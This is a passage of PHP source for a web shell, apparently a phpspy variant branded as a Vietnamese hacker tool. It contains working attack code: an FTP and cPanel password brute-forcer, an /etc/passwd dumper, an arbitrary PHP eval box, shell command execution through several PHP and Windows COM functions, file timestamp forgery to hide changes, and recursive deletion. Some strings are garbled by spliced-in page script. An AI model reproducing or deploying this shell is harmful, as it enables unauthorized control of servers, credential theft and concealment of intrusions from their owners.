12901290 /* <![CDATA[ */!function(){try{var t="currentScript"in document?document.currentScript:function(){for(var t=document.getElementsByTagName("script"),e=t.length;e--;)if(t[e].getAttribute("cf-hash"))return t[e]}();if(t&&t.previousSibling){var e,r,n,i,c=t.previousSibling,a=c.getAttribute("data-cfemail");if(a){for(e="",r=parseInt(a.substr(0,2),16),n=2;a.length-n;n+=2)i=parseInt(a.substr(n,2),16)^r,e+=String.fromCharCode(i);e=document.createTextNode(e),c.parentNode.replaceChild(e,c)}}}catch(u){}}();/* ]]> */ ]# </b>
12911291 <b> Attacking has been done! Username: <font color='#FF0000'> $user </font> / Password:<font color='#FF0000'> $pass </font> => <a href=http://$user:$pass@$host:2082 target=_blank>Login</a></b><br>");
12921292 }
12931293 curl_close($ch);
12941294 }
12951295 function cpanel_check($host, $user, $pass, $timeout) {
12961296 $ch = curl_init();
12971297 curl_setopt($ch, CURLOPT_URL, "http://$host:2082");
12981298 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
12991299 curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
13001300 curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
13011301 curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
13021302 curl_setopt($ch, CURLOPT_FAILONERROR, 1);
13031303 $data = curl_exec($ch);
13041304 if (curl_errno($ch) == 28) {
13051305 print "<b> Error : Connection timed out , make confidence about validation of target !</b>";
13061306 exit;
13071307 } elseif (curl_errno($ch) == 0) {
13081308 p("<b>[ attack@vbateam.net
13091309 /* <![CDATA[ */!function(){try{var t="currentScript"in document?document.currentScript:function(){for(var t=document.getElementsByTagName("script"),e=t.length;e--;)if(t[e].getAttribute("cf-hash"))return t[e]}();if(t&&t.previousSibling){var e,r,n,i,c=t.previousSibling,a=c.getAttribute("data-cfemail");if(a){for(e="",r=parseInt(a.substr(0,2),16),n=2;a.length-n;n+=2)i=parseInt(a.substr(n,2),16)^r,e+=String.fromCharCode(i);e=document.createTextNode(e),c.parentNode.replaceChild(e,c)}}}catch(u){}}();/* ]]> */ ]# </b><b>Attacking has been done!</a> Username: <font color='#FF0000'> $user </font> / Password:<font color='#FF0000'> $pass </font></b><br>");
13101310 }
13111311 curl_close($ch);
13121312 }
13131313 if (isset($submit) && !empty($submit)) {
13141314 $userlist = explode("\n", $users);
13151315 $passlist = explode("\n", $pass);
13161316 p('<b>[ attack@vbateam.net
13171317 /* <![CDATA[ */!function(){try{var t="currentScript"in document?document.currentScript:function(){for(var t=document.getElementsByTagName("script"),e=t.length;e--;)if(t[e].getAttribute("cf-hash"))return t[e]}();if(t&&t.previousSibling){var e,r,n,i,c=t.previousSibling,a=c.getAttribute("data-cfemail");if(a){for(e="",r=parseInt(a.substr(0,2),16),n=2;a.length-n;n+=2)i=parseInt(a.substr(n,2),16)^r,e+=String.fromCharCode(i);e=document.createTextNode(e),c.parentNode.replaceChild(e,c)}}}catch(u){}}();/* ]]> */ ]# Attacking ...</font></b><br>');
13181318 foreach ($userlist as $user) {
13191319 $_user = trim($user);
13201320 foreach ($passlist as $password) {
13211321 $_pass = trim($password);
13221322 if ($option == "ftp") {
13231323 ftp_check($target, $_user, $_pass, $connect_timeout);
13241324 }
13251325 if ($option == "cpanel") {
13261326 cpanel_check($target, $_user, $_pass, $connect_timeout);
13271327 }
13281328 }
13291329 }
13301330 }
13311331 formfoot();
13321332 } elseif ($action == 'etcpwd') {
13331333 formhead(array('title' => 'Get /etc/passwd'));
13341334 makehide('action', 'etcpwd');
13351335 makehide('dir', $nowpath);
13361336 $i = 0;
13371337 echo "<p><br><textarea class=\"area\" id=\"phpcodexxx\" name=\"phpcodexxx\" cols=\"100\" rows=\"25\">";
13381338 while ($i < 60000) {
13391339 $line = posix_getpwuid($i);
13401340 if (!empty($line)) {
13411341 while (list($key, $vba_etcpwd) = each($line)) {
13421342 echo "" . $vba_etcpwd . "\n";
13431343 break;
13441344 }
13451345 }
13461346 $i++;
13471347 }
13481348 echo "</textarea></p>";
13491349 formfoot();
13501350 } elseif ($action == 'eval') {
13511351 $phpcode = trim($phpcode);
13521352 if ($phpcode) {
13531353 if (!preg_match('#<\?#si', $phpcode)) {
13541354 $phpcode = "<?php\n\n{$phpcode}\n\n?>";
13551355 }
13561356 eval("?" . ">$phpcode<?");
13571357 }
13581358 formhead(array('title' => 'Eval PHP Code'));
13591359 makehide('action', 'eval');
13601360 maketext(array('title' => 'PHP Code', 'name' => 'phpcode', 'value' => $phpcode));
13611361 p('<p><a href="http://www.4ngel.net/phpspy/plugin/" target="_blank">Get plugins</a></p>');
13621362 formfooter();
13631363 } //end eval
13641364 elseif ($action == 'editfile') {
13651365 if (file_exists($opfile)) {
13661366 $fp = @fopen($opfile, 'r');
13671367 $contents = @fread($fp, filesize($opfile));
13681368 @fclose($fp);
13691369 $contents = htmlspecialchars($contents);
13701370 }
13711371 formhead(array('title' => 'Create / Edit File'));
13721372 makehide('action', 'file');
13731373 makehide('dir', $nowpath);
13741374 makeinput(array('title' => 'Current File (import new file name and new file)', 'name' => 'editfilename', 'value' => $opfile, 'newline' => 1));
13751375 maketext(array('title' => 'File Content', 'name' => 'filecontent', 'value' => $contents));
13761376 formfooter();
13771377 } //end editfile
13781378 elseif ($action == 'newtime') {
13791379 $opfilemtime = @filemtime($opfile);
13801380 //$time = strtotime("$year-$month-$day $hour:$minute:$second");
13811381 $cachemonth = array('January' => 1, 'February' => 2, 'March' => 3, 'April' => 4, 'May' => 5, 'June' => 6, 'July' => 7, 'August' => 8, 'September' => 9, 'October' => 10, 'November' => 11, 'December' => 12);
13821382 formhead(array('title' => 'Clone file was last modified time'));
13831383 makehide('action', 'file');
13841384 makehide('dir', $nowpath);
13851385 makeinput(array('title' => 'Alter file', 'name' => 'curfile', 'value' => $opfile, 'size' => 120, 'newline' => 1));
13861386 makeinput(array('title' => 'Reference file (fullpath)', 'name' => 'tarfile', 'size' => 120, 'newline' => 1));
13871387 formfooter();
13881388 formhead(array('title' => 'Set last modified'));
13891389 makehide('action', 'file');
13901390 makehide('dir', $nowpath);
13911391 makeinput(array('title' => 'Current file (fullpath)', 'name' => 'curfile', 'value' => $opfile, 'size' => 120, 'newline' => 1));
13921392 p('<p>Instead »');
13931393 p('year:');
13941394 makeinput(array('name' => 'year', 'value' => date('Y', $opfilemtime), 'size' => 4));
13951395 p('month:');
13961396 makeinput(array('name' => 'month', 'value' => date('m', $opfilemtime), 'size' => 2));
13971397 p('day:');
13981398 makeinput(array('name' => 'day', 'value' => date('d', $opfilemtime), 'size' => 2));
13991399 p('hour:');
14001400 makeinput(array('name' => 'hour', 'value' => date('H', $opfilemtime), 'size' => 2));
14011401 p('minute:');
14021402 makeinput(array('name' => 'minute', 'value' => date('i', $opfilemtime), 'size' => 2));
14031403 p('second:');
14041404 makeinput(array('name' => 'second', 'value' => date('s', $opfilemtime), 'size' => 2));
14051405 p('</p>');
14061406 formfooter();
14071407 } //end newtime
14081408 elseif ($action == 'shell') {
14091409 if (IS_WIN && IS_COM) {
14101410 if ($program && $parameter) {
14111411 $shell = new COM('Shell.Application');
14121412 $a = $shell->ShellExecute($program, $parameter);
14131413 m('Program run has ' . (!$a ? 'success' : 'fail'));
14141414 }
14151415 !$program && $program = 'c:\windows\system32\cmd.exe';
14161416 !$parameter && $parameter = '/c net start > ' . SA_ROOT . 'log.txt';
14171417 formhead(array('title' => 'Execute Program'));
14181418 makehide('action', 'shell');
14191419 makeinput(array('title' => 'Program', 'name' => 'program', 'value' => $program, 'newline' => 1));
14201420 p('<p>');
14211421 makeinput(array('title' => 'Parameter', 'name' => 'parameter', 'value' => $parameter));
14221422 makeinput(array('name' => 'submit', 'class' => 'bt', 'type' => 'submit', 'value' => 'Execute'));
14231423 p('</p>');
14241424 formfoot();
14251425 }
14261426 formhead(array('title' => 'Execute Command'));
14271427 makehide('action', 'shell');
14281428 if (IS_WIN && IS_COM) {
14291429 $execfuncdb = array('phpfunc' => 'phpfunc', 'wscript' => 'wscript', 'proc_open' => 'proc_open');
14301430 makeselect(array('title' => 'Use:', 'name' => 'execfunc', 'option' => $execfuncdb, 'selected' => $execfunc, 'newline' => 1));
14311431 }
14321432 p('<p>');
14331433 makeinput(array('title' => 'Command', 'name' => 'command', 'value' => $command));
14341434 makeinput(array('name' => 'submit', 'class' => 'bt', 'type' => 'submit', 'value' => 'Execute'));
14351435 p('</p>');
14361436 formfoot();
14371437 if ($command) {
14381438 p('<hr width="100%" noshade /><pre>');
14391439 if ($execfunc == 'wscript' && IS_WIN && IS_COM) {
14401440 $wsh = new COM('WScript.shell');
14411441 $exec = $wsh->exec('cmd.exe /c ' . $command);
14421442 $stdout = $exec->StdOut();
14431443 $stroutput = $stdout->ReadAll();
14441444 echo $stroutput;
14451445 } elseif ($execfunc == 'proc_open' && IS_WIN && IS_COM) {
14461446 $descriptorspec = array(0 => array('pipe', 'r'), 1 => array('pipe', 'w'), 2 => array('pipe', 'w'));
14471447 $process = proc_open($_SERVER['COMSPEC'], $descriptorspec, $pipes);
14481448 if (is_resource($process)) {
14491449 fwrite($pipes[0], $command . "\r\n");
14501450 fwrite($pipes[0], "exit\r\n");
14511451 fclose($pipes[0]);
14521452 while (!feof($pipes[1])) {
14531453 echo fgets($pipes[1], 1024);
14541454 }
14551455 fclose($pipes[1]);
14561456 while (!feof($pipes[2])) {
14571457 echo fgets($pipes[2], 1024);
14581458 }
14591459 fclose($pipes[2]);
14601460 proc_close($process);
14611461 }
14621462 } else {
14631463 echo (execute($command));
14641464 }
14651465 p('</pre>');
14661466 }
14671467 } //end shell
14681468 elseif ($action == 'phpenv') {
14691469 $upsize = getcfg('file_uploads') ? getcfg('upload_max_filesize') : 'Not allowed';
14701470 $adminmail = isset($_SERVER['SERVER_ADMIN']) ? $_SERVER['SERVER_ADMIN'] : getcfg('sendmail_from');
14711471 !$dis_func && $dis_func = 'No';
14721472 $info = array(1 => array('Server Time', date('Y/m/d h:i:s', $timestamp)), 2 => array('Server Domain', $_SERVER['SERVER_NAME']), 3 => array('Server IP', gethostbyname($_SERVER['SERVER_NAME'])), 4 => array('Server OS', PHP_OS), 5 => array('Server OS Charset', $_SERVER['HTTP_ACCEPT_LANGUAGE']), 6 => array('Server Software', $_SERVER['SERVER_SOFTWARE']), 7 => array('Server Web Port', $_SERVER['SERVER_PORT']), 8 => array('PHP run mode', strtoupper(php_sapi_name())), 9 => array('The file path', __FILE__), 10 => array('PHP Version', PHP_VERSION), 11 => array('PHPINFO', (IS_PHPINFO ? '<a href="javascript:goaction(\'phpinfo\');">Yes</a>' : 'No')), 12 => array('Safe Mode', getcfg('safe_mode')), 13 => array('Administrator', $adminmail), 14 => array('allow_url_fopen', getcfg('allow_url_fopen')), 15 => array('enable_dl', getcfg('enable_dl')), 16 => array('display_errors', getcfg('display_errors')), 17 => array('register_globals', getcfg('register_globals')), 18 => array('magic_quotes_gpc', getcfg('magic_quotes_gpc')), 19 => array('memory_limit', getcfg('memory_limit')), 20 => array('post_max_size', getcfg('post_max_size')), 21 => array('upload_max_filesize', $upsize), 22 => array('max_execution_time', getcfg('max_execution_time') . ' second(s)'), 23 => array('disable_functions', $dis_func),);
14731473 if ($phpvarname) {
14741474 m($phpvarname . ' : ' . getcfg($phpvarname));
14751475 }
14761476 formhead(array('title' => 'Server environment'));
14771477 makehide('action', 'phpenv');
14781478 makeinput(array('title' => 'Please input PHP configuration parameter(eg:magic_quotes_gpc)', 'name' => 'phpvarname', 'value' => $phpvarname, 'newline' => 1));
14791479 formfooter();
14801480 $hp = array(0 => 'Server', 1 => 'PHP');
14811481 for ($a = 0;$a < 2;$a++) {
14821482 p('<h2>' . $hp[$a] . ' »</h2>');
14831483 p('<ul class="info">');
14841484 if ($a == 0) {
14851485 for ($i = 1;$i <= 9;$i++) {
14861486 p('<li><u>' . $info[$i][0] . ':</u>' . $info[$i][1] . '</li>');
14871487 }
14881488 } elseif ($a == 1) {
14891489 for ($i = 10;$i <= 23;$i++) {
14901490 p('<li><u>' . $info[$i][0] . ':</u>' . $info[$i][1] . '</li>');
14911491 }
14921492 }
14931493 p('</ul>');
14941494 }
14951495 } //end phpenv
14961496 else {
14971497 m('Undefined Action');
14981498 }
14991499 ?>
15001500 </td></tr></table>
15011501 <div style="padding:10px;border-bottom:1px solid #0E0E0E;border-top:1px solid #0E0E0E;background:#0E0E0E;">
15021502 <span style="float:right;"><?php debuginfo();
15031503 ob_end_flush(); ?></span>
15041504 Copyright (C) 2004-2010 <B></B> - Develop by <a href=http://beyeugroup.com target=_blank><B>BYG </B></a> - <B>- The Legend of Vietnamese Hacker World</B> All Rights Reserved.
15051505 </div>
15061506 </body>
15071507 </html>
15081508
15091509 <?php
15101510 /*======================================================
15111511 Show info shell
15121512 ======================================================*/
15131513 function m($msg) {
15141514 echo '<div style="background:#f1f1f1;border:1px solid #ddd;padding:15px;font:14px;text-align:center;font-weight:bold;">';
15151515 echo $msg;
15161516 echo '</div>';
15171517 }
15181518 function scookie($key, $value, $life = 0, $prefix = 1) {
15191519 global $admin, $timestamp, $_SERVER;
15201520 $key = ($prefix ? $admin['cookiepre'] : '') . $key;
15211521 $life = $life ? $life : $admin['cookielife'];
15221522 $useport = $_SERVER['SERVER_PORT'] == 443 ? 1 : 0;
15231523 setcookie($key, $value, $timestamp + $life, $admin['cookiepath'], $admin['cookiedomain'], $useport);
15241524 }
15251525 function multi($num, $perpage, $curpage, $tablename) {
15261526 $multipage = '';
15271527 if ($num > $perpage) {
15281528 $page = 10;
15291529 $offset = 5;
15301530 $pages = @ceil($num / $perpage);
15311531 if ($page > $pages) {
15321532 $from = 1;
15331533 $to = $pages;
15341534 } else {
15351535 $from = $curpage - $offset;
15361536 $to = $curpage + $page - $offset - 1;
15371537 if ($from < 1) {
15381538 $to = $curpage + 1 - $from;
15391539 $from = 1;
15401540 if (($to - $from) < $page && ($to - $from) < $pages) {
15411541 $to = $page;
15421542 }
15431543 } elseif ($to > $pages) {
15441544 $from = $curpage - $pages + $to;
15451545 $to = $pages;
15461546 if (($to - $from) < $page && ($to - $from) < $pages) {
15471547 $from = $pages - $page + 1;
15481548 }
15491549 }
15501550 }
15511551 $multipage = ($curpage - $offset > 1 && $pages > $page ? '<a href="javascript:settable(\'' . $tablename . '\', \'\', 1);">First</a> ' : '') . ($curpage > 1 ? '<a href="javascript:settable(\'' . $tablename . '\', \'\', ' . ($curpage - 1) . ');">Prev</a> ' : '');
15521552 for ($i = $from;$i <= $to;$i++) {
15531553 $multipage.= $i == $curpage ? $i . ' ' : '<a href="javascript:settable(\'' . $tablename . '\', \'\', ' . $i . ');">[' . $i . ']</a> ';
15541554 }
15551555 $multipage.= ($curpage < $pages ? '<a href="javascript:settable(\'' . $tablename . '\', \'\', ' . ($curpage + 1) . ');">Next</a>' : '') . ($to < $pages ? ' <a href="javascript:settable(\'' . $tablename . '\', \'\', ' . $pages . ');">Last</a>' : '');
15561556 $multipage = $multipage ? '<p>Pages: ' . $multipage . '</p>' : '';
15571557 }
15581558 return $multipage;
15591559 }
15601560 // Login page
15611561 function loginpage() {
15621562 ?>
15631563 <html>
15641564 <head>
15651565
15661566 <body bgcolor=black background=1.jpg>
15671567
15681568 <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
15691569 <title>BYG - The Legend of Vietnamese Hacker World </title>
15701570 <style type="text/css">
15711571 A:link {text-decoration: none; color: green }
15721572 A:visited {text-decoration: none;color:red}
15731573 A:active {text-decoration: none}
15741574 A:hover {text-decoration: underline; color: green;}
15751575 input, textarea, button
15761576 {
15771577 font-size: 11pt;
15781578 color: #FFFFFF;
15791579 font-family: verdana, sans-serif;
15801580 background-color: #000000;
15811581 border-left: 2px dashed #8B0000;
15821582 border-top: 2px dashed #8B0000;
15831583 border-right: 2px dashed #8B0000;
15841584 border-bottom: 2px dashed #8B0000;
15851585 }
15861586
15871587 </style>
15881588
15891589 <BR><BR>
15901590 <div align=center >
15911591
15921592 <div>
15931593 <font color=gray>
15941594 <br /><br /><br /><br /><br />
15951595
15961596 <form method="POST" action="">
15971597 <span style="font:20pt tahoma;"> </span><input name="password" type="password" size="30">
15981598 <input type="hidden" name="doing" value="login">
15991599 <input type="submit" value="Login">
16001600 </form>
16011601 <BR>
16021602 <?php
16031603 echo "" . $err_mess . "";
16041604 ?>
16051605
16061606 <B><font color=red>
16071607
16081608
16091609
16101610
16111611
16121612
16131613 </div>
16141614
16151615
16161616 </fieldset>
16171617
16181618
16191619
16201620 </head>
16211621 </html>
16221622
16231623
16241624 <?php
16251625 exit;
16261626 } //end loginpage()
16271627 function execute($cfe) {
16281628 $res = '';
16291629 if ($cfe) {
16301630 if (function_exists('exec')) {
16311631 @exec($cfe, $res);
16321632 $res = join("\n", $res);
16331633 } elseif (function_exists('shell_exec')) {
16341634 $res = @shell_exec($cfe);
16351635 } elseif (function_exists('system')) {
16361636 @ob_start();
16371637 @system($cfe);
16381638 $res = @ob_get_contents();
16391639 @ob_end_clean();
16401640 } elseif (function_exists('passthru')) {
16411641 @ob_start();
16421642 @passthru($cfe);
16431643 $res = @ob_get_contents();
16441644 @ob_end_clean();
16451645 } elseif (@is_resource($f = @popen($cfe, "r"))) {
16461646 $res = '';
16471647 while (!@feof($f)) {
16481648 $res.= @fread($f, 1024);
16491649 }
16501650 @pclose($f);
16511651 }
16521652 }
16531653 return $res;
16541654 }
16551655 function which($pr) {
16561656 $path = execute("which $pr");
16571657 return ($path ? $path : $pr);
16581658 }
16591659 function cf($fname, $text) {
16601660 if ($fp = @fopen($fname, 'w')) {
16611661 @fputs($fp, base64_decode($text));
16621662 @fclose($fp);
16631663 }
16641664 }
16651665 // Debug
16661666 function debuginfo() {
16671667 global $starttime;
16681668 $mtime = explode(' ', microtime());
16691669 $totaltime = number_format(($mtime[1] + $mtime[0] - $starttime), 6);
16701670 echo 'Processed in ' . $totaltime . ' second(s)';
16711671 }
16721672 // Function connect database
16731673 function dbconn($dbhost, $dbuser, $dbpass, $dbname = '', $charset = '', $dbport = '3306') {
16741674 if (!$link = @mysql_connect($dbhost . ':' . $dbport, $dbuser, $dbpass)) {
16751675 p('<h2>Can not connect to MySQL server</h2>');
16761676 exit;
16771677 }
16781678 if ($link && $dbname) {
16791679 if (!@mysql_select_db($dbname, $link)) {
16801680 p('<h2>Database selected has error</h2>');
16811681 exit;
16821682 }
16831683 }
16841684 if ($link && mysql_get_server_info() > '4.1') {
16851685 if (in_array(strtolower($charset), array('gbk', 'big5', 'utf8'))) {
16861686 q("SET character_set_connection=$charset, character_set_results=$charset, character_set_client=binary;", $link);
16871687 }
16881688 }
16891689 return $link;
16901690 }
16911691 // Array strip
16921692 function s_array(&$array) {
16931693 if (is_array($array)) {
16941694 foreach ($array as $k => $v) {
16951695 $array[$k] = s_array($v);
16961696 }
16971697 } else if (is_string($array)) {
16981698 $array = stripslashes($array);
16991699 }
17001700 return $array;
17011701 }
17021702 // HTML Strip
17031703 function html_clean($content) {
17041704 $content = htmlspecialchars($content);
17051705 $content = str_replace("\n", "<br />", $content);
17061706 $content = str_replace(" ", " ", $content);
17071707 $content = str_replace("\t", " ", $content);
17081708 return $content;
17091709 }
17101710 // Chmod
17111711 function getChmod($filepath) {
17121712 return substr(base_convert(@fileperms($filepath), 10, 8), -4);
17131713 }
17141714 function getPerms($filepath) {
17151715 $mode = @fileperms($filepath);
17161716 if (($mode & 0xC000) === 0xC000) {
17171717 $type = 's';
17181718 } elseif (($mode & 0x4000) === 0x4000) {
17191719 $type = 'd';
17201720 } elseif (($mode & 0xA000) === 0xA000) {
17211721 $type = 'l';
17221722 } elseif (($mode & 0x8000) === 0x8000) {
17231723 $type = '-';
17241724 } elseif (($mode & 0x6000) === 0x6000) {
17251725 $type = 'b';
17261726 } elseif (($mode & 0x2000) === 0x2000) {
17271727 $type = 'c';
17281728 } elseif (($mode & 0x1000) === 0x1000) {
17291729 $type = 'p';
17301730 } else {
17311731 $type = '?';
17321732 }
17331733 $owner['read'] = ($mode & 00400) ? 'r' : '-';
17341734 $owner['write'] = ($mode & 00200) ? 'w' : '-';
17351735 $owner['execute'] = ($mode & 00100) ? 'x' : '-';
17361736 $group['read'] = ($mode & 00040) ? 'r' : '-';
17371737 $group['write'] = ($mode & 00020) ? 'w' : '-';
17381738 $group['execute'] = ($mode & 00010) ? 'x' : '-';
17391739 $world['read'] = ($mode & 00004) ? 'r' : '-';
17401740 $world['write'] = ($mode & 00002) ? 'w' : '-';
17411741 $world['execute'] = ($mode & 00001) ? 'x' : '-';
17421742 if ($mode & 0x800) {
17431743 $owner['execute'] = ($owner['execute'] == 'x') ? 's' : 'S';
17441744 }
17451745 if ($mode & 0x400) {
17461746 $group['execute'] = ($group['execute'] == 'x') ? 's' : 'S';
17471747 }
17481748 if ($mode & 0x200) {
17491749 $world['execute'] = ($world['execute'] == 'x') ? 't' : 'T';
17501750 }
17511751 return $type . $owner['read'] . $owner['write'] . $owner['execute'] . $group['read'] . $group['write'] . $group['execute'] . $world['read'] . $world['write'] . $world['execute'];
17521752 }
17531753 function getUser($filepath) {
17541754 if (function_exists('posix_getpwuid')) {
17551755 $array = @posix_getpwuid(@fileowner($filepath));
17561756 if ($array && is_array($array)) {
17571757 return ' / <a href="#" title="User: ' . $array['name'] . '
Passwd: ' . $array['passwd'] . '
Uid: ' . $array['uid'] . '
gid: ' . $array['gid'] . '
Gecos: ' . $array['gecos'] . '
Dir: ' . $array['dir'] . '
Shell: ' . $array['shell'] . '">' . $array['name'] . '</a>';
17581758 }
17591759 }
17601760 return '';
17611761 }
17621762 // Delete dir
17631763 function deltree($deldir) {
17641764 $mydir = @dir($deldir);
17651765 while ($file = $mydir->read()) {
17661766 if ((is_dir($deldir . '/' . $file)) && ($file != '.') && ($file != '..')) {
17671767 @chmod($deldir . '/' . $file, 0777);
17681768 deltree($deldir . '/' . $file);
17691769 }
17701770 if (is_file($deldir . '/' . $file)) {
17711771 @chmod($deldir . '/' . $file, 0777);
17721772 @unlink($deldir . '/' . $file);
17731773 }
17741774 }
17751775 $mydir->close();
17761776 @chmod($deldir, 0777);
17771777 return @rmdir($deldir) ? 1 : 0;
17781778 }
17791779 // Background
17801780 function bg() {
17811781 global $bgc;
17821782 return ($bgc++ % 2 == 0) ? 'alt1' : 'alt2';
17831783 }
17841784 // Get path
17851785 function getPath($scriptpath, $nowpath) {
17861786 if ($nowpath == '.') {
17871787 $nowpath = $scriptpath;
17881788 }
17891789 $nowpath = str_replace('\\', '/', $nowpath);
17901790 $nowpath = str_replace('//', '/', $nowpath);
17911791 if (substr($nowpath, -1) != '/') {
17921792 $nowpath = $nowpath . '/';
17931793 }
17941794 return $nowpath;
17951795 }
17961796 // Get up path
17971797 function getUpPath($nowpath) {
17981798 $pathdb = explode('/', $nowpath);
17991799 $num = count($pathdb);
18001800 if ($num > 2) {
18011801 unset($pathdb[$num - 1], $pathdb[$num - 2]);
18021802 }
18031803 $uppath = implode('/', $pathdb) . '/';
18041804 $uppath = str_replace('//', '/', $uppath);
18051805 return $uppath;
18061806 }
18071807 // Config
18081808 function getcfg($varname) {
18091809 $result = get_cfg_var($varname);
18101810 if ($result == 0) {
18111811 return 'No';
18121812 } elseif ($result == 1) {
18131813 return 'Yes';
18141814 } else {
18151815 return $result;
18161816 }
18171817 }
18181818 // Function name
18191819 function getfun($funName) {
18201820 return (false !== function_exists($funName)) ? 'Yes' : 'No';
18211821 }
18221822 function GetList($dir) {
18231823 global $dirdata, $j, $nowpath;
18241824 !$j && $j = 1;
18251825 if ($dh = opendir($dir)) {
18261826 while ($file = readdir($dh)) {
18271827 $f = str_replace('//', '/', $dir . '/' . $file);
18281828 if ($file != '.' && $file != '..' && is_dir($f)) {
18291829 if (is_writable($f)) {
18301830 $dirdata[$j]['filename'] = str_replace($nowpath, '', $f);
18311831 $dirdata[$j]['mtime'] = @date('Y-m-d H:i:s', filemtime($f));
18321832 $dirdata[$j]['dirchmod'] = getChmod($f);
18331833 $dirdata[$j]['dirperm'] = getPerms($f);
18341834 $dirdata[$j]['dirlink'] = ue($dir);
18351835 $dirdata[$j]['server_link'] = $f;
18361836 $dirdata[$j]['client_link'] = ue($f);
18371837 $j++;
18381838 }
18391839 GetList($f);
18401840 }
18411841 }
18421842 closedir($dh);
18431843 clearstatcache();
18441844 return $dirdata;
18451845 } else {
18461846 return array();
18471847 }
18481848 }
18491849 function qy($sql) {
18501850 //echo $sql.'<br>';
18511851 $res = $error = '';
18521852 if (!$res = @mysql_query($sql)) {
18531853 return 0;
18541854 } else if (is_resource($res)) {
18551855 return 1;
18561856 } else {
18571857 return 2;
18581858 }
18591859 return 0;
18601860 }
18611861 function q($sql) {
18621862 return @mysql_query($sql);
18631863 }
18641864 function fr($qy) {
18651865 mysql_free_result($qy);
18661866 }
18671867 function sizecount($size) {
18681868 if ($size > 1073741824) {
18691869 $size = round($size / 1073741824 * 100) / 100 . ' G';
18701870 } elseif ($size > 1048576) {
18711871 $size = round($size / 1048576 * 100) / 100 . ' M';
18721872 } elseif ($size > 1024) {
18731873 $size = round($size / 1024 * 100) / 100 . ' K';
18741874 } else {
18751875 $size = $size . ' B';
18761876 }
18771877 return $size;
18781878 }
18791879 // Zip
18801880 class PHPZip {
18811881 var $out = '';
18821882 function PHPZip($dir) {
18831883 if (@function_exists('gzcompress')) {
18841884 $curdir = getcwd();
18851885 if (is_array($dir)) $filelist = $dir;
18861886 else {
18871887 $filelist = $this->GetFileList($dir); //File list
18881888 foreach ($filelist as $k => $v) $filelist[] = substr($v, strlen($dir) + 1);
18891889 }
18901890 if ((!empty($dir)) && (!is_array($dir)) && (file_exists($dir))) chdir($dir);
18911891 else chdir($curdir);
18921892 if (count($filelist) > 0) {
18931893 foreach ($filelist as $filename) {
18941894 if (is_file($filename)) {
18951895 $fd = fopen($filename, 'r');
18961896 $content = @fread($fd, filesize($filename));
18971897 fclose($fd);
18981898 if (is_array($dir)) $filename = basename($filename);
18991899 $this->addFile($content, $filename);
19001900 }
19011901 }
19021902 $this->out = $this->file();
19031903 chdir($curdir);
19041904 }
19051905 return 1;
19061906 } else return 0;
19071907 }
19081908 // Show file list
19091909 function GetFileList($dir) {
19101910 static $a;
19111911 if (is_dir($dir)) {
19121912 if ($dh = opendir($dir)) {
19131913 while ($file = readdir($dh)) {
19141914 if ($file != '.' && $file != '..') {
19151915 $f = $dir . '/' . $file;
19161916 if (is_dir($f)) $this->GetFileList($f);
19171917 $a[] = $f;
19181918 }
19191919 }
19201920 closedir($dh);
19211921 }
19221922 }
19231923 return $a;
19241924 }
19251925 var $datasec = array();
19261926 var $ctrl_dir = array();
19271927 var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
19281928 var $old_offset = 0;
19291929 function unix2DosTime($unixtime = 0) {
19301930 $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
19311931 if ($timearray['year'] < 1980) {
19321932 $timearray['year'] = 1980;
19331933 $timearray['mon'] = 1;
19341934 $timearray['mday'] = 1;
19351935 $timearray['hours'] = 0;
19361936 $timearray['minutes'] = 0;
19371937 $timearray['seconds'] = 0;
19381938 } // end if
19391939 return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) | ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);
19401940 }
19411941 function addFile($data, $name, $time = 0) {
19421942 $name = str_replace('\\', '/', $name);
19431943 $dtime = dechex($this->unix2DosTime($time));
19441944 $hexdtime = '\x' . $dtime[6] . $dtime[7] . '\x' . $dtime[4] . $dtime[5] . '\x' . $dtime[2] . $dtime[3] . '\x' . $dtime[0] . $dtime[1];
19451945 eval('$hexdtime = "' . $hexdtime . '";');
19461946 $fr = "\x50\x4b\x03\x04";
19471947 $fr.= "\x14\x00";
19481948 $fr.= "\x00\x00";
19491949 $fr.= "\x08\x00";
19501950 $fr.= $hexdtime;
19511951 $unc_len = strlen($data);
19521952 $crc = crc32($data);
19531953 $zdata = gzcompress($data);
19541954 $c_len = strlen($zdata);
19551955 $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
19561956 $fr.= pack('V', $crc);
19571957 $fr.= pack('V', $c_len);
19581958 $fr.= pack('V', $unc_len);
19591959 $fr.= pack('v', strlen($name));
19601960 $fr.= pack('v', 0);
19611961 $fr.= $name;
19621962 $fr.= $zdata;
19631963 $fr.= pack('V', $crc);
19641964 $fr.= pack('V', $c_len);
19651965 $fr.= pack('V', $unc_len);
19661966 $this->datasec[] = $fr;
19671967 $new_offset = strlen(implode('', $this->datasec));
19681968 $cdrec = "\x50\x4b\x01\x02";
19691969 $cdrec.= "\x00\x00";
19701970 $cdrec.= "\x14\x00";
19711971 $cdrec.= "\x00\x00";
19721972 $cdrec.= "\x08\x00";
19731973 $cdrec.= $hexdtime;
19741974 $cdrec.= pack('V', $crc);
19751975 $cdrec.= pack('V', $c_len);
19761976 $cdrec.= pack('V', $unc_len);
19771977 $cdrec.= pack('v', strlen($name));
19781978 $cdrec.= pack('v', 0);
19791979 $cdrec.= pack('v', 0);
19801980 $cdrec.= pack('v', 0);
19811981 $cdrec.= pack('v', 0);
19821982 $cdrec.= pack('V', 32);
19831983 $cdrec.= pack('V', $this->old_offset);
19841984 $this->old_offset = $new_offset;
19851985 $cdrec.= $name;
19861986 $this->ctrl_dir[] = $cdrec;
19871987 }
19881988 function file() {
19891989 $data = implode('', $this->datasec);
19901990 $ctrldir = implode('', $this->ctrl_dir);
19911991 return $data . $ctrldir . $this->eof_ctrl_dir . pack('v', sizeof($this->ctrl_dir)) . pack('v', sizeof($this->ctrl_dir)) . pack('V', strlen($ctrldir)) . pack('V', strlen($data)) . "\x00\x00";
19921992 }
19931993 }
